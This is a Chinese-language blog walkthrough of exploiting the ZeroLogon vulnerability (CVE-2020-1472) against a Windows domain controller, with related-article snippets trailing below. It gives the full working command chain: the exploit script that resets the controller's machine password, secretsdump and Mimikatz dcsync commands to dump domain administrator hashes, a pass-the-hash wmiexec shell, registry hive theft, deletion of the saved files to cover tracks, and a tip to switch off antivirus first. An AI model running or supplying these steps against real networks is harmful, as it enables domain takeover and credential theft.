<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    CVE-2020-1472攻擊過程

    VSole2021-12-17 16:42:22

    漏洞介紹

    在去年9月份,國外披露了CVE-2020-1472(又被叫做ZeroLogon)的漏洞詳情,網上也隨即公開了Exp。

    是近幾年windows上比較重量級別的一個漏洞。通過該漏洞,攻擊者只需能夠訪問域控的445端口,在無需任何憑據的情況下能拿到域管的權限。

    該漏洞的產生來源于Netlogon協議認證的加密模塊存在缺陷,導致攻擊者可以在沒有憑證的情況情況下通過認證。該漏洞的最穩定利用是調用netlogon中RPC函數NetrServerPasswordSet2來重置域控的密碼,從而以域控的身份進行Dcsync獲取域管權限。CVE-2020-1472來重置域控密碼。

    注意,這里是域控密碼,不是域管的密碼。是域控這個機器用戶的密碼。可能對域不是很熟悉的人對這點不是很了解。在域內,機器用戶跟域用戶一樣,是域內的成員,他在域內的用戶名是機器用戶+$(如DC2016\$),在本地的用戶名是SYSTEM。

    在擁有域控的機器用戶密碼的情況下,并不能直接使用該密碼登錄域控,因為機器用戶是不可以登錄的,但是因為域控的機器用戶具備Dcsync特權,我們就可以濫用該特權來進行Dcsync。

    環境

    攻擊機 windows 10

    域控服務器 windows server 2012 192.168.139.147

    python 3.8

    準備工具

    • https://github.com/VoidSec/CVE-2020-1472
    • https://github.com/maaaaz/impacket-examples-windows 【這是下面包中腳本轉成的exe】
    • https://github.com/SecureAuthCorp/impacket

    impacket需要使用最新的要用Impacket v0.9.22.dev1+20200915.160006.1397e2b5,并不是release中,或者pip中直接指定的

    建議:git clone 

    https://github.com/SecureAuthCorp/impacket.git

    當然也可以直接:

    其次如果使用的linux,執行腳本在出現$之類的特殊字符需要\轉義,我在window下執行,沒遇到這個問題,域和計算機名搞混淆,導致參數填寫錯誤,哪個是域,哪個是計算機名,看下圖:


    關于坑點

    在windows中有python啟動器,py -3指定使用python3,防止選錯python版本。

    安裝impacket這步,手動安裝,并且把requirements.txt中的impacket==0.9.21這行去掉,不然執行py -3 pip install -r requirements.txt安裝其他庫時,impacket又裝一遍,會覆蓋掉最新版。

    安裝過程

    先卸載舊版本

    py -3 -m pip uninstall impacket
    

    安裝新版本

    git clone https://github.com/SecureAuthCorp/impacketcd impacketpy -3 setup.py install
    

    報錯說明

    AttributeError:

    module'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2',屬于坑點1,手動安裝impacket解決。
    

    secretsdump.py執行后無法獲取NTDS.DIT信息,多半是域和計算機名混淆或者出現$未轉義,對照坑點計算機名確認。

    [-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
    

    多半是域和計算機名混淆或者出現$未轉義,對照坑點3的圖片,確認下,自己環境中對應的參數填寫正確沒。

    利用

    環境準備就緒以后,運行exp,記得關殺軟

    py -3 cve-2020-1472-exploit.py -n DC -t 192.168.1.150-n 計算機名-t 域控ip
    

    檢測到存在漏洞,Y繼續清空域控密碼

    成功之后用剛剛下載的

    impacket-examples-windows

    通過secretsdump.exe dump 域管 hash

    .\secretsdump.exe -no-pass -just-dc DC$@192.168.1.150-no-pass 無密碼登錄-just-dc 僅提取NTDS.DIT數據(NTLM哈希和Kerberos鍵)DC$@192.168.1.150 計算機名$@域控ip
    

    獲取域控機器shell 和 導出域控計算機帳戶的原始NT哈希

    hashes 域管理員的nthash:lmhash.\wmiexec.exe–hashes aad3b435b51404eeaad3b435b51404ee:570a9a65db8fba761c1008a51d4c95abtest.com/administrator@192.168.1.150
    

    此時會返回一個交互式域控shell

    本地保存文件

    reg save HKLM\SYSTEM system.savereg save HKLM\SAM sam.savereg save HKLM\SECURITY security.save
    

    下載文件

    get system.saveget sam.saveget security.save
    

    擦屁股

    del /f system.savedel /f sam.savedel /f security.save
    

    讀取下載的文件計算原本的機器用戶密碼

    .\ secretsdump.exe -sam sam.save -system system.save -security security.save LOCAL
    


    隨后把密碼錘回去,這里使用的值是$MACHINE.ACC: 后的hash



    .\secretsdump.exe -no-pass -just-dc DC$@192.168.1.150-no-pass 無密碼登錄-just-dc 僅提取NTDS.DIT數據(NTLM哈希和Kerberos鍵)DC$@192.168.1.150 計算機名$@域控ip
    


    Mimikatz利用方式

    探測是否存在漏洞

    lsadump::zerologon/target:192.168.1.150 /account?C$lsadump::zerologon/target:192.168.1.150 /account?C$ /exploit 攻擊
    

    lsadump::dcsync /domain:test.com /dc?C /user:Administrator/authuser?C$/authdomain:test/authpassword:""/authntlm
    

    ----通過dcsync dump域管hash

    提升權限注入會話

    privilege::debugsekurlsa::pth/user:Administrator/doamin:. /rc4:570a9a65db8fba761c1008a51d4c95ab
    

    在注入會話的窗口打開mimikatz 恢復機器用戶密碼 隨后可以開始下一步操作

    lsadump::postzerologon /target:192.168.1.150 /account?C$
    

    參考:

    1.https://www.t00ls.net/viewthread.php?tid=57866&extra=&highlight=cve-2020-1472&page=1

    2.https://mp.weixin.qq.com/s/S9Hwb1-lLhh4QfI4b551SQ

    system
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    Systemctl 介紹Systemctl是一個systemd工具,主要負責控制systemd系統和服務管理器。Systemd的功能是用于集中管理和配置類UNIX系統。在Linux生態系統中,Systemd被部署到了大多數的標準Linux發行版中,只有為數不多的幾個發行版尚未部署。Systemd通常是所有其它守護進程的父進程,但并非總是如此。開始Systemd和Systemctl 基礎工具之旅01、首先檢查系統上是否安裝了systemd以及當前安裝的Systemd的版本是什么?
    之后想到了更完美的辦法
    一個未知的威脅行為者與對南非一家發電公司的網絡攻擊有關,SystemBC惡意軟件的一種新變種稱為DroxiDat,是可疑勒索軟件攻擊的前兆。
    發現漏洞七月正值暑假,閑暇時光在百度上inurl一番,找到了一個古老的企業OA系統IP站點,沒有域名,掃過一眼,.NET流行時代的普遍漏洞浮現在腦海里——SQL注入在用戶名里輸入admin’,不負期望地報了錯很明顯,前后端都沒有對用戶的輸入進行過濾,直接將’帶入了SQL語句進行。初步判斷,此OA系統存在SQL注入漏洞。漏洞驗證打開BurpSuite,設置好瀏覽器代理,抓下HTTP請求,一氣呵成。
    閑來無事,我上網隨便找了一個驅動來進行測試。
    美國國防巨頭Elbit Systems子公司Elbit Systems of America在Black Basta勒索軟件團伙宣稱入侵后披露數據泄露事件。
    SystemInformer是一款功能強大的系統安全檢測工具,該工具功能十分強大,不僅可以幫助廣大研究人員監控系統資源,而且還支持軟件調試和惡意軟件檢測。
    又是一個深夜,記錄前段時間測試的過程。唉,每次小有所學就要懈怠一會。全文高強度打碼。 0x00 一個登錄框 使用google hacking語法,翻了一翻,鎖定了目標范圍內一個看起來普普通通的登錄頁面。
    北京新云東方系統科技有限公司稱,IBM無視保密協議,為新合資企業(與浪潮集團一起)謀取客戶信息。 目前,該公司已經向美國紐約南區地方法院提起了訴訟。 早在2014年,華勝天成就與IBM中國合資成立北京新云東方系統科技有限公司(以下簡稱“新云系統”),主要負責基于Linux on Power相關的硬件和軟件產品的開發,以及向當地市場銷售IBM Power Systems 服務器。IBM持有新云系
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类